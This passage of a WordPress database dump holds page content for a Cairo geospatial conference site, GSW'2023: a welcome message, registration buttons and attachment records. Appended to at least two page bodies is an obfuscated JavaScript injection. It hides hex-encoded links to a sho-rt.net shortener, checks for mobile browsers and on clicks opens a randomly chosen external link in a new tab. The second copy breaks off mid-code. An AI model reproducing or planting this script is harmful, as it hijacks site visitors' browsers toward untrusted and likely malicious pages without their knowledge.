JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm.gsw2023.com%2Fpages%2Fregistration.html\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182820572{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-07 13:51:01','2022-10-07 13:51:01','',2167,'https://gsw2023.com/?p=2401',0,'revision','',0),
(2402,1,'2022-10-07 14:12:32','2022-10-07 14:12:32','','hd3m','','inherit','open','closed','','hd3m','','','2022-10-07 14:12:32','2022-10-07 14:12:32','',2095,'https://gsw2023.com/wp-content/uploads/2020/04/hd3m.jpg',0,'attachment','image/jpeg',0),
(2403,1,'2022-10-07 14:12:53','2022-10-07 14:12:53','','MMT and HD Maps - Mobile Mapping Technologies and HD Maps','','inherit','closed','closed','','2095-revision-v1','','','2022-10-07 14:12:53','2022-10-07 14:12:53','',2095,'https://gsw2023.com/?p=2403',0,'revision','',0),
(2404,1,'2022-10-07 14:13:12','2022-10-07 14:13:12','<p>[vc_row][vc_column][dt_portfolio_masonry mode=\"grid\" content_alignment=\"center\" custom_content_bg_color=\"#f7f7f7\" post_content_paddings=\"20px 30px 30px 30px\" resized_image_dimensions=\"3x2\" image_border_radius=\"0px\" image_paddings=\"20px 20px 0px 20px\" post_title_font_size=\"22px\" post_title_line_height=\"32px\" post_date=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"default_button\" read_more_button_text=\"Details\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" loading_mode=\"js_more\" jsm_posts_per_page=\"6\" show_categories_filter=\"y\" category=\"\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 